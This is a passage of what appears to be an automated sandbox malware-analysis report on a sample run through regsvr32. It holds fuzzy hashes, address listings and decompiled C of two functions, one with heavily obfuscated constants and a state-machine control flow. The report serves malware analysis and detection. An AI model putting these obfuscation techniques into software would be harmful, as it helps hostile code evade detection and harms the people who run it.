                                                                                                                • Opcode Fuzzy Hash: a6f9b21d7378f3e9ed87a34ea381f4048454587f0797339b73997999416b7569
                                                                                                                • Instruction Fuzzy Hash: 7B023071508380DFD368CF65C98AA5BFBE1FBC5758F10891DE2AA86260D7B48949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AAEBB Relevance: 10.5, Strings: 8, Instructions: 477COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AAEBB(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1584;
				char _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				unsigned int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				void* _t539;
				void* _t541;
				void* _t543;
				void* _t549;
				void* _t560;
				void* _t561;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				void* _t575;
				signed int _t631;
				void* _t633;
				signed int* _t638;

				_t638 =  &_v1812;
				_v1568 = _v1568 & 0x00000000;
				_v1592 = _v1592 & 0x00000000;
				_v1572 = 0x68e3db;
				_v1664 = 0x610915;
				_v1664 = _v1664 << 0xc;
				_v1664 = _v1664 ^ 0x12915000;
				_v1616 = 0x697c94;
				_v1616 = _v1616 + 0xa67e;
				_v1616 = _v1616 ^ 0x00612c99;
				_v1776 = 0xe52c1a;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 + 0x7cde;
				_v1776 = _v1776 + 0xffffa36c;
				_v1776 = _v1776 ^ 0x0006cca4;
				_v1704 = 0xaa56f;
				_t561 = __ecx;
				_t633 = 0x9693e9c;
				_t563 = 0x4c;
				_v1704 = _v1704 / _t563;
				_t564 = 0x25;
				_v1704 = _v1704 * 0x43;
				_v1704 = _v1704 ^ 0x000dab72;
				_v1656 = 0xc2af88;
				_v1656 = _v1656 | 0x26503769;
				_v1656 = _v1656 ^ 0x26d30127;
				_v1716 = 0x3ba327;
				_v1716 = _v1716 + 0xffff84a8;
				_v1716 = _v1716 * 0x68;
				_v1716 = _v1716 ^ 0x180fd7cb;
				_v1780 = 0xee69dd;
				_v1780 = _v1780 << 6;
				_t565 = 0x50;
				_v1780 = _v1780 / _t564;
				_v1780 = _v1780 * 0x46;
				_v1780 = _v1780 ^ 0x70cc70b2;
				_v1736 = 0x13adce;
				_t566 = 0x1c;
				_v1736 = _v1736 / _t565;
				_v1736 = _v1736 >> 9;
				_v1736 = _v1736 ^ 0x0003a8fb;
				_v1596 = 0xce22a8;
				_v1596 = _v1596 + 0x3740;
				_v1596 = _v1596 ^ 0x00cad873;
				_v1764 = 0xc24fa7;
				_v1764 = _v1764 | 0xf3ffef7f;
				_v1764 = _v1764 ^ 0xf3fae66a;
				_v1672 = 0xc77ded;
				_v1672 = _v1672 >> 6;
				_v1672 = _v1672 | 0x1d847990;
				_v1672 = _v1672 ^ 0x1d8cae63;
				_v1804 = 0x2b6435;
				_t90 =  &_v1804; // 0x2b6435
				_v1804 =  *_t90 / _t566;
				_t567 = 0x53;
				_v1804 = _v1804 * 0x3d;
				_t98 =  &_v1804; // 0x2b6435
				_v1804 =  *_t98 / _t567;
				_v1804 = _v1804 ^ 0x000097bc;
				_v1648 = 0x90188;
				_v1648 = _v1648 + 0xc58;
				_v1648 = _v1648 ^ 0x000a1232;
				_v1788 = 0x9a20f4;
				_v1788 = _v1788 << 8;
				_v1788 = _v1788 + 0xac97;
				_v1788 = _v1788 << 4;
				_v1788 = _v1788 ^ 0xa215eae8;
				_v1772 = 0x178759;
				_v1772 = _v1772 << 0xf;
				_v1772 = _v1772 ^ 0x84990de2;
				_v1772 = _v1772 >> 2;
				_v1772 = _v1772 ^ 0x11c2f5f4;
				_v1796 = 0x2ce783;
				_v1796 = _v1796 >> 2;
				_v1796 = _v1796 | 0x6f1782c3;
				_v1796 = _v1796 + 0x2451;
				_v1796 = _v1796 ^ 0x6f12aa04;
				_v1720 = 0x9c60fd;
				_v1720 = _v1720 << 1;
				_t568 = 0x23;
				_v1720 = _v1720 / _t568;
				_v1720 = _v1720 ^ 0x000f58cb;
				_v1756 = 0x8bc3f2;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff95d1;
				_v1756 = _v1756 ^ 0x7ff02180;
				_v1696 = 0x7cdd3a;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 | 0xfdb2741d;
				_v1696 = _v1696 ^ 0xfdbcd6c5;
				_v1728 = 0xe73abc;
				_v1728 = _v1728 | 0x6e75fbf9;
				_v1728 = _v1728 ^ 0x6ef4a0a3;
				_v1680 = 0xa3734b;
				_v1680 = _v1680 >> 0xa;
				_v1680 = _v1680 + 0xfffff23b;
				_v1680 = _v1680 ^ 0x00099982;
				_v1640 = 0x68bc18;
				_t569 = 7;
				_v1640 = _v1640 / _t569;
				_v1640 = _v1640 ^ 0x0004804f;
				_v1608 = 0x3b7e68;
				_v1608 = _v1608 ^ 0x96f38c4e;
				_v1608 = _v1608 ^ 0x96ce3d84;
				_v1812 = 0x66c0c4;
				_v1812 = _v1812 ^ 0x0371dc8e;
				_v1812 = _v1812 ^ 0x83ad28b8;
				_v1812 = _v1812 ^ 0xba53d132;
				_v1812 = _v1812 ^ 0x3ae49120;
				_v1740 = 0xa899c4;
				_v1740 = _v1740 | 0x81257cef;
				_v1740 = _v1740 * 0x16;
				_v1740 = _v1740 ^ 0x24f9ffc3;
				_v1744 = 0x1e6f8a;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0xd2194421;
				_v1744 = _v1744 ^ 0xd21d6a9e;
				_v1688 = 0x5de058;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 + 0xffff2d11;
				_v1688 = _v1688 ^ 0x00b58664;
				_v1712 = 0x5e2fb;
				_v1712 = _v1712 << 5;
				_v1712 = _v1712 ^ 0x8dfc1fd7;
				_v1712 = _v1712 ^ 0x8d498c2f;
				_v1808 = 0x5d15d;
				_v1808 = _v1808 << 4;
				_v1808 = _v1808 >> 0xe;
				_v1808 = _v1808 >> 3;
				_v1808 = _v1808 ^ 0x000869e0;
				_v1732 = 0x112c8f;
				_v1732 = _v1732 ^ 0x12cb99d9;
				_t570 = 0x7c;
				_v1732 = _v1732 * 0x57;
				_v1732 = _v1732 ^ 0x6858727c;
				_v1632 = 0x88191e;
				_v1632 = _v1632 + 0xffffea18;
				_v1632 = _v1632 ^ 0x008250c3;
				_v1600 = 0xd2352c;
				_v1600 = _v1600 ^ 0xc4ec158a;
				_v1600 = _v1600 ^ 0xc43b0267;
				_v1724 = 0x573c94;
				_v1724 = _v1724 | 0xf8fbf6e1;
				_v1724 = _v1724 ^ 0xf8f91863;
				_v1792 = 0x74582;
				_v1792 = _v1792 >> 4;
				_v1792 = _v1792 >> 0xa;
				_v1792 = _v1792 + 0xbeaf;
				_v1792 = _v1792 ^ 0x0000ae4c;
				_v1800 = 0xf1ee8c;
				_v1800 = _v1800 * 0x54;
				_v1800 = _v1800 >> 0xe;
				_v1800 = _v1800 + 0xffffcc4e;
				_v1800 = _v1800 ^ 0x000b99f5;
				_v1612 = 0x5c5aae;
				_v1612 = _v1612 + 0xff1;
				_v1612 = _v1612 ^ 0x005a1e6e;
				_v1604 = 0x27f9fc;
				_v1604 = _v1604 / _t570;
				_v1604 = _v1604 ^ 0x0008fdbe;
				_v1748 = 0xa4da7d;
				_t571 = 0x68;
				_v1748 = _v1748 / _t571;
				_v1748 = _v1748 ^ 0x34f5f9dd;
				_v1748 = _v1748 ^ 0x34f242ab;
				_v1624 = 0x1a2b2;
				_t572 = 0x69;
				_v1624 = _v1624 * 0x32;
				_v1624 = _v1624 ^ 0x0057c87d;
				_v1700 = 0x5bce4e;
				_v1700 = _v1700 >> 5;
				_v1700 = _v1700 * 0x6c;
				_v1700 = _v1700 ^ 0x0134c15a;
				_v1784 = 0x9955ec;
				_v1784 = _v1784 >> 7;
				_v1784 = _v1784 * 0x34;
				_v1784 = _v1784 + 0xffff49ce;
				_v1784 = _v1784 ^ 0x00353c69;
				_v1708 = 0xb31777;
				_v1708 = _v1708 ^ 0xc77cb4e9;
				_v1708 = _v1708 + 0xc5f3;
				_v1708 = _v1708 ^ 0xc7d1b3fe;
				_v1676 = 0xaa4a91;
				_v1676 = _v1676 + 0xfc6e;
				_v1676 = _v1676 / _t572;
				_v1676 = _v1676 ^ 0x000c8e39;
				_v1684 = 0xb648eb;
				_v1684 = _v1684 >> 4;
				_v1684 = _v1684 + 0x8860;
				_v1684 = _v1684 ^ 0x00058981;
				_v1660 = 0x513288;
				_v1660 = _v1660 | 0x1cfd3e15;
				_v1660 = _v1660 ^ 0x1cf1ec34;
				_v1692 = 0x91b840;
				_v1692 = _v1692 << 3;
				_v1692 = _v1692 + 0xffff3bf5;
				_v1692 = _v1692 ^ 0x048d4768;
				_v1644 = 0x6a299;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 ^ 0x1a8e8b21;
				_v1652 = 0x3d94ce;
				_v1652 = _v1652 >> 1;
				_v1652 = _v1652 ^ 0x001bc2e7;
				_v1768 = 0xb0a76e;
				_v1768 = _v1768 << 6;
				_v1768 = _v1768 + 0xa6cd;
				_v1768 = _v1768 >> 0xa;
				_v1768 = _v1768 ^ 0x0004832b;
				_v1628 = 0x2e4687;
				_v1628 = _v1628 + 0xffffac4b;
				_v1628 = _v1628 ^ 0x002cc275;
				_v1636 = 0xa9f549;
				_v1636 = _v1636 + 0xffff292b;
				_v1636 = _v1636 ^ 0x00a23c9a;
				_v1760 = 0x45f6a6;
				_v1760 = _v1760 >> 0xf;
				_v1760 = _v1760 ^ 0xccdd989a;
				_t573 = 0xa;
				_v1760 = _v1760 / _t573;
				_v1760 = _v1760 ^ 0x147ba7f9;
				_v1752 = 0x2233d0;
				_v1752 = _v1752 << 8;
				_v1752 = _v1752 >> 4;
				_v1752 = _v1752 + 0xfffff122;
				_v1752 = _v1752 ^ 0x02232ddb;
				_v1620 = 0xd19212;
				_v1620 = _v1620 + 0xffff56ae;
				_v1620 = _v1620 ^ 0x00df8423;
				_v1668 = 0x399e92;
				_t574 = 0x36;
				_v1668 = _v1668 / _t574;
				_v1668 = _v1668 * 0x3e;
				_v1668 = _v1668 ^ 0x00471d1e;
				_t631 = _v1592;
				while(1) {
					L1:
					_t575 = 0x622b027;
					L2:
					while(_t633 != 0x984a2e) {
						if(_t633 == _t575) {
							_push(_v1592);
							_t543 = E001A71E3( &_v1588, _v1724, _t575, _v1792, _v1800,  &_v1564, _v1612);
							_t638 =  &(_t638[7]);
							__eflags = _t543;
							if(__eflags != 0) {
								E001B02D8(_v1588, _v1604, _v1748, _v1624);
								E001B02D8(_v1584, _v1700, _v1784, _v1708);
								_t638 =  &(_t638[4]);
							}
							L14:
							_t633 = 0x7c360ca;
							while(1) {
								L1:
								_t575 = 0x622b027;
								goto L2;
							}
						}
						if(_t633 == 0x7c360ca) {
							return E001B02D8(_v1592, _v1752, _v1620, _v1668);
						}
						if(_t633 == 0x9693e9c) {
							_t633 = 0x984a2e;
							continue;
						}
						if(_t633 == 0xa9a4faa) {
							_t549 = E001B4E54(_v1676, 0, __eflags, 0,  &_v1588, _v1684,  &_v1564, _v1660, _t575, _v1692);
							__eflags = _t549;
							if(_t549 == 0) {
								L25:
								return _t549;
							}
							E001B02D8(_v1588, _v1644, _v1652, _v1768);
							return E001B02D8(_v1584, _v1628, _v1636, _v1760);
						}
						if(_t633 == 0xda9000a) {
							E001C0575(_v1780, _v1736, __eflags, _t575,  &_v1044, _v1596);
							 *((short*)(E001A2263( &_v1044, _v1764, _v1672, _v1804))) = 0;
							E001B9054(_v1648,  &_v524, __eflags, _v1788, _v1772, _v1796);
							_push(_v1728);
							_push(0x1a11a8);
							_push(_v1696);
							E001B8EB3( &_v1044, __eflags, _v1680, _v1720, _v1640,  &_v1564, _v1608, E001BF5D9(_v1720, _v1756, __eflags), _v1812);
							E001BF94B(_t556, _v1740, _v1744, _v1688, _v1712);
							_t560 = E001C05F6( &_v1564, _t561, _v1808, _v1732, _v1632, _v1600);
							_t638 =  &(_t638[0x19]);
							__eflags = _t560;
							if(__eflags != 0) {
								_t541 = 0xb6f9751;
								__eflags = _t631 - 0xb6f9751;
								_t575 = 0x622b027;
								_t633 =  ==  ? 0x622b027 : 0xa9a4faa;
								continue;
							}
							goto L14;
						}
						if(_t633 != 0xf1ce6d9) {
							L20:
							__eflags = _t633 - 0xf890da5;
							if(__eflags != 0) {
								continue;
							}
							return _t541;
						}
						if(_t631 != _t541) {
							_t633 = 0xda9000a;
							continue;
						}
						_push(_t575);
						_t549 = E001B3983( &_v1592, _v1704, _v1664, _v1656, _v1716);
						_t638 =  &(_t638[5]);
						if(_t549 == 0) {
							goto L25;
						}
						_t633 = 0xda9000a;
						goto L1;
					}
					_t539 = E001C26FC();
					__eflags = _t539 - E001C131D();
					_t541 = 0xb6f9751;
					_t633 = 0xf1ce6d9;
					_t631 =  !=  ? 0xb6f9751 : 0x5ebfea7;
					_t575 = 0x622b027;
					goto L20;
				}
			}
























































































                                                                                                                0x001aaebb
                                                                                                                0x001aaec1
                                                                                                                0x001aaecb
                                                                                                                0x001aaed3
                                                                                                                0x001aaede
                                                                                                                0x001aaee9
                                                                                                                0x001aaef1
                                                                                                                0x001aaefc
                                                                                                                0x001aaf07
                                                                                                                0x001aaf12
                                                                                                                0x001aaf1d
                                                                                                                0x001aaf25
                                                                                                                0x001aaf2a
                                                                                                                0x001aaf32
                                                                                                                0x001aaf3a
                                                                                                                0x001aaf42
                                                                                                                0x001aaf54
                                                                                                                0x001aaf56
                                                                                                                0x001aaf5b
                                                                                                                0x001aaf60
                                                                                                                0x001aaf71
                                                                                                                0x001aaf74
                                                                                                                0x001aaf7b
                                                                                                                0x001aaf86
                                                                                                                0x001aaf91
                                                                                                                0x001aaf9c
                                                                                                                0x001aafa7
                                                                                                                0x001aafaf
                                                                                                                0x001aafbc
                                                                                                                0x001aafc0
                                                                                                                0x001aafc8
                                                                                                                0x001aafd0
                                                                                                                0x001aafdb
                                                                                                                0x001aafdc
                                                                                                                0x001aafe9
                                                                                                                0x001aafed
                                                                                                                0x001aaff5
                                                                                                                0x001ab003
                                                                                                                0x001ab004
                                                                                                                0x001ab00a
                                                                                                                0x001ab00f
                                                                                                                0x001ab017
                                                                                                                0x001ab022
                                                                                                                0x001ab02d
                                                                                                                0x001ab038
                                                                                                                0x001ab040
                                                                                                                0x001ab048
                                                                                                                0x001ab050
                                                                                                                0x001ab05b
                                                                                                                0x001ab063
                                                                                                                0x001ab06e
                                                                                                                0x001ab079
                                                                                                                0x001ab081
                                                                                                                0x001ab089
                                                                                                                0x001ab094
                                                                                                                0x001ab095
                                                                                                                0x001ab099
                                                                                                                0x001ab0a1
                                                                                                                0x001ab0a7
                                                                                                                0x001ab0af
                                                                                                                0x001ab0ba
                                                                                                                0x001ab0c5
                                                                                                                0x001ab0d0
                                                                                                                0x001ab0d8
                                                                                                                0x001ab0dd
                                                                                                                0x001ab0e5
                                                                                                                0x001ab0ea
                                                                                                                0x001ab0f2
                                                                                                                0x001ab0fa
                                                                                                                0x001ab0ff
                                                                                                                0x001ab107
                                                                                                                0x001ab10c
                                                                                                                0x001ab114
                                                                                                                0x001ab11c
                                                                                                                0x001ab121
                                                                                                                0x001ab129
                                                                                                                0x001ab131
                                                                                                                0x001ab139
                                                                                                                0x001ab141
                                                                                                                0x001ab149
                                                                                                                0x001ab14e
                                                                                                                0x001ab154
                                                                                                                0x001ab15c
                                                                                                                0x001ab164
                                                                                                                0x001ab169
                                                                                                                0x001ab16e
                                                                                                                0x001ab176
                                                                                                                0x001ab17e
                                                                                                                0x001ab189
                                                                                                                0x001ab191
                                                                                                                0x001ab19c
                                                                                                                0x001ab1a7
                                                                                                                0x001ab1af
                                                                                                                0x001ab1b7
                                                                                                                0x001ab1bf
                                                                                                                0x001ab1ca
                                                                                                                0x001ab1d2
                                                                                                                0x001ab1dd
                                                                                                                0x001ab1e8
                                                                                                                0x001ab1fa
                                                                                                                0x001ab1fd
                                                                                                                0x001ab204
                                                                                                                0x001ab20f
                                                                                                                0x001ab21a
                                                                                                                0x001ab225
                                                                                                                0x001ab230
                                                                                                                0x001ab238
                                                                                                                0x001ab240
                                                                                                                0x001ab248
                                                                                                                0x001ab250
                                                                                                                0x001ab258
                                                                                                                0x001ab260
                                                                                                                0x001ab26d
                                                                                                                0x001ab271
                                                                                                                0x001ab279
                                                                                                                0x001ab281
                                                                                                                0x001ab286
                                                                                                                0x001ab28e
                                                                                                                0x001ab296
                                                                                                                0x001ab2a1
                                                                                                                0x001ab2a8
                                                                                                                0x001ab2b3
                                                                                                                0x001ab2be
                                                                                                                0x001ab2c6
                                                                                                                0x001ab2cb
                                                                                                                0x001ab2d3
                                                                                                                0x001ab2db
                                                                                                                0x001ab2e3
                                                                                                                0x001ab2e8
                                                                                                                0x001ab2ef
                                                                                                                0x001ab2f4
                                                                                                                0x001ab2fc
                                                                                                                0x001ab304
                                                                                                                0x001ab313
                                                                                                                0x001ab316
                                                                                                                0x001ab31a
                                                                                                                0x001ab322
                                                                                                                0x001ab32d
                                                                                                                0x001ab338
                                                                                                                0x001ab343
                                                                                                                0x001ab34e
                                                                                                                0x001ab359
                                                                                                                0x001ab364
                                                                                                                0x001ab36c
                                                                                                                0x001ab374
                                                                                                                0x001ab37c
                                                                                                                0x001ab384
                                                                                                                0x001ab389
                                                                                                                0x001ab38e
                                                                                                                0x001ab396
                                                                                                                0x001ab39e
                                                                                                                0x001ab3ab
                                                                                                                0x001ab3af
                                                                                                                0x001ab3b4
                                                                                                                0x001ab3bc
                                                                                                                0x001ab3c4
                                                                                                                0x001ab3cf
                                                                                                                0x001ab3da
                                                                                                                0x001ab3e5
                                                                                                                0x001ab3fb
                                                                                                                0x001ab402
                                                                                                                0x001ab40d
                                                                                                                0x001ab419
                                                                                                                0x001ab41e
                                                                                                                0x001ab424
                                                                                                                0x001ab42c
                                                                                                                0x001ab434
                                                                                                                0x001ab447
                                                                                                                0x001ab448
                                                                                                                0x001ab44f
                                                                                                                0x001ab45a
                                                                                                                0x001ab465
                                                                                                                0x001ab475
                                                                                                                0x001ab47c
                                                                                                                0x001ab487
                                                                                                                0x001ab48f
                                                                                                                0x001ab499
                                                                                                                0x001ab49d
                                                                                                                0x001ab4a5
                                                                                                                0x001ab4ad
                                                                                                                0x001ab4b5
                                                                                                                0x001ab4bd
                                                                                                                0x001ab4c5
                                                                                                                0x001ab4cd
                                                                                                                0x001ab4d8
                                                                                                                0x001ab4ec
                                                                                                                0x001ab4f3
                                                                                                                0x001ab4fe
                                                                                                                0x001ab509
                                                                                                                0x001ab511
                                                                                                                0x001ab51c
                                                                                                                0x001ab527
                                                                                                                0x001ab532
                                                                                                                0x001ab53f
                                                                                                                0x001ab54f
                                                                                                                0x001ab55a
                                                                                                                0x001ab562
                                                                                                                0x001ab56d
                                                                                                                0x001ab578
                                                                                                                0x001ab583
                                                                                                                0x001ab58b
                                                                                                                0x001ab596
                                                                                                                0x001ab5a1
                                                                                                                0x001ab5a8
                                                                                                                0x001ab5b3
                                                                                                                0x001ab5bb
                                                                                                                0x001ab5c0
                                                                                                                0x001ab5c8
                                                                                                                0x001ab5cd
                                                                                                                0x001ab5d5
                                                                                                                0x001ab5e0
                                                                                                                0x001ab5eb
                                                                                                                0x001ab5f6
                                                                                                                0x001ab601
                                                                                                                0x001ab60c
                                                                                                                0x001ab617
                                                                                                                0x001ab61f
                                                                                                                0x001ab624
                                                                                                                0x001ab632
                                                                                                                0x001ab637
                                                                                                                0x001ab63d
                                                                                                                0x001ab645
                                                                                                                0x001ab64d
                                                                                                                0x001ab652
                                                                                                                0x001ab657
                                                                                                                0x001ab65f
                                                                                                                0x001ab667
                                                                                                                0x001ab672
                                                                                                                0x001ab67d
                                                                                                                0x001ab688
                                                                                                                0x001ab69a
                                                                                                                0x001ab69d
                                                                                                                0x001ab6ac
                                                                                                                0x001ab6b3
                                                                                                                0x001ab6be
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6ca
                                                                                                                0x00000000
                                                                                                                0x001ab6cf
                                                                                                                0x001ab6dd
                                                                                                                0x001ab88f
                                                                                                                0x001ab8bc
                                                                                                                0x001ab8c1
                                                                                                                0x001ab8c4
                                                                                                                0x001ab8c6
                                                                                                                0x001ab8e1
                                                                                                                0x001ab8ff
                                                                                                                0x001ab904
                                                                                                                0x001ab904
                                                                                                                0x001ab865
                                                                                                                0x001ab865
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6ca
                                                                                                                0x00000000
                                                                                                                0x001ab6ca
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6e5
                                                                                                                0x00000000
                                                                                                                0x001ab9ea
                                                                                                                0x001ab6f1
                                                                                                                0x001ab885
                                                                                                                0x00000000
                                                                                                                0x001ab885
                                                                                                                0x001ab6fd
                                                                                                                0x001ab97e
                                                                                                                0x001ab986
                                                                                                                0x001ab988
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9a3
                                                                                                                0x00000000
                                                                                                                0x001ab9c6
                                                                                                                0x001ab709
                                                                                                                0x001ab778
                                                                                                                0x001ab7ac
                                                                                                                0x001ab7ba
                                                                                                                0x001ab7c2
                                                                                                                0x001ab7c6
                                                                                                                0x001ab7cb
                                                                                                                0x001ab815
                                                                                                                0x001ab832
                                                                                                                0x001ab859
                                                                                                                0x001ab85e
                                                                                                                0x001ab861
                                                                                                                0x001ab863
                                                                                                                0x001ab86c
                                                                                                                0x001ab876
                                                                                                                0x001ab878
                                                                                                                0x001ab87d
                                                                                                                0x00000000
                                                                                                                0x001ab87d
                                                                                                                0x00000000
                                                                                                                0x001ab863
                                                                                                                0x001ab711
                                                                                                                0x001ab93c
                                                                                                                0x001ab93c
                                                                                                                0x001ab942
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ab942
                                                                                                                0x001ab719
                                                                                                                0x001ab756
                                                                                                                0x00000000
                                                                                                                0x001ab756
                                                                                                                0x001ab71b
                                                                                                                0x001ab73c
                                                                                                                0x001ab741
                                                                                                                0x001ab746
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ab74c
                                                                                                                0x00000000
                                                                                                                0x001ab74c
                                                                                                                0x001ab917
                                                                                                                0x001ab923
                                                                                                                0x001ab92a
                                                                                                                0x001ab92f
                                                                                                                0x001ab934
                                                                                                                0x001ab937
                                                                                                                0x00000000
                                                                                                                0x001ab937

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 5d+$@7$Q$$X]$h~;$i7P&$i<5$|rXh
                                                                                                                • API String ID: 2962429428-4098937169
                                                                                                                • Opcode ID: 7453b5fb682db0a03e07f07c96acb4bd75c459ec1e69be3f915431a21a5ec0e5
                                                                                                                • Instruction ID: 2e8f575114a46f6d2bec20dfed92e90284238eb82a77c36e4210da12092137f8
                                                                                                                • Opcode Fuzzy Hash: 7453b5fb682db0a03e07f07c96acb4bd75c459ec1e69be3f915431a21a5ec0e5
                                                                                                                • Instruction Fuzzy Hash: C04201715083818FD7B9CF25C58AB9BBBE1BBC5708F108A1DE5DA96260D7B18948CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000FFB0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 407windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1000FFB0(struct HWND__* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t129;
				long* _t132;
				long* _t137;
				void* _t145;
				intOrPtr _t151;
				long* _t152;
				long* _t153;
				long* _t154;
				long* _t155;
				void* _t181;
				intOrPtr _t188;
				signed int _t189;
				void* _t198;
				signed int _t202;
				long* _t204;
				signed int _t205;
				long* _t209;
				signed int** _t213;
				signed int** _t215;
				intOrPtr _t216;
				long* _t222;
				long* _t224;
				long* _t226;
				long* _t228;
				signed int _t229;
				long* _t232;
				long* _t234;
				long* _t235;
				long* _t237;
				long* _t239;
				long* _t241;
				long* _t243;
				long* _t245;
				intOrPtr _t255;
				long* _t264;
				long* _t265;
				long* _t266;
				long* _t267;
				long* _t269;
				long* _t274;
				long* _t275;
				long* _t276;
				long* _t281;
				signed int _t282;
				long* _t296;
				signed int _t307;
				signed int _t309;
				intOrPtr _t317;
				long _t319;
				void* _t321;
				signed int _t322;
				void* _t324;
				void* _t345;

				_t295 = __edx;
				_push(0xffffffff);
				_push(E10051FE8);
				_push( *[fs:0x0]);
				_t322 = _t321 - 0x6c;
				_push(_t229);
				_push(_t312);
				_t129 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t129 ^ _t322);
				 *[fs:0x0] = _t322 + 0x80;
				_t232 =  *0x1006f050; // 0x0
				_t319 = 0;
				_t325 = _t232[0x99];
				if(_t232[0x99] != 0) {
					L2:
					_t315 =  *(_t322 + 0x90);
					_t312 = SendMessageA;
					if(_t315 != _t319) {
						goto L3;
					}
				} else {
					_t315 = E1000CD90(_t325);
					_t188 =  *((intOrPtr*)(_t315 + 8));
					_t229 = 0;
					 *(_t322 + 0x20) = _t315;
					 *((intOrPtr*)(_t322 + 0x24)) = _t188;
					if(_t188 > 0) {
						while(1) {
							_t189 = E100173A6();
							__eflags = _t189 - _t319;
							_t271 = 0 | __eflags != 0x00000000;
							if(__eflags == 0) {
								break;
							}
							_t271 = _t189;
							 *(_t322 + 0x18) =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0xc))))() + 0x10;
							__eflags = _t229 - _t319;
							 *(_t322 + 0x88) = _t319;
							if(__eflags < 0) {
								L21:
								E1001729E(_t229, _t271, _t312, _t315, __eflags);
								L22:
								E1000FE50(_t319, _t315);
								_t322 = _t322 + 4;
								L23:
								_t266 =  *0x1006f050; // 0x0
								_t295 = _t266[0x15c];
								_t315 = SendMessageA(_t266[0x15c], 0x110a, 1, _t315);
								_t329 = _t315 - _t319;
								if(_t315 != _t319) {
									L3:
									_t264 =  *0x1006f050; // 0x0
									_t265 =  &(_t264[0x154]);
									_t181 = E10026483(_t265, _t315);
									_t328 = _t181;
									if(_t181 == 0) {
										goto L22;
									} else {
										_push(_t265);
										_t267 =  *0x1006f050; // 0x0
										 *(_t322 + 0x94) = _t322;
										_push(_t315);
										E10026A46(_t229,  &(_t267[0x154]), _t295, _t312, _t315, _t328);
										_t269 =  *0x1006f050; // 0x0
										E1000EC00(_t269, _t295, _t328, _t322);
									}
									goto L23;
								}
							} else {
								__eflags = _t229 -  *((intOrPtr*)(_t315 + 8));
								if(__eflags >= 0) {
									goto L21;
								} else {
									_push( *((intOrPtr*)(_t315 + 4)) + _t229 * 4);
									E10001FF0(_t322 + 0x1c);
									_t274 =  *0x1006f050; // 0x0
									_t315 =  *(_t322 + 0x18);
									_t275 =  &(_t274[0x13f]);
									E1001D2C4(_t275, _t315);
									_push(_t275);
									_t319 = _t315 - 0x10;
									 *(_t322 + 0x20) = _t322;
									_t312 = _t322;
									_t198 = E10001080(_t229, _t319);
									_t324 = _t322 + 4;
									_t295 = _t324 + 0x18;
									 *_t322 = _t198 + 0x10;
									_t276 =  *0x1006f050; // 0x0
									E1000E6F0(_t276, _t324 + 0x18, __eflags, _t324 + 0x18);
									 *((char*)(_t324 + 0x90)) = 1;
									_t202 = E1003BD06( *((intOrPtr*)(_t324 + 0x14)), 0x10056948);
									_t322 = _t324 + 8;
									_t202 = _t202 & 0xffffff00 | _t202 != 0x00000000;
									if((_t202 & 0xffffff00 | _t202 != 0x00000000) != 0) {
										_t222 =  *0x1006f050; // 0x0
										_t28 =  &(_t222[0xd6]); // 0x358
										E10026562(_t28, 1, _t222[0x43b], 0x10056948, 0, 0, 0, 0);
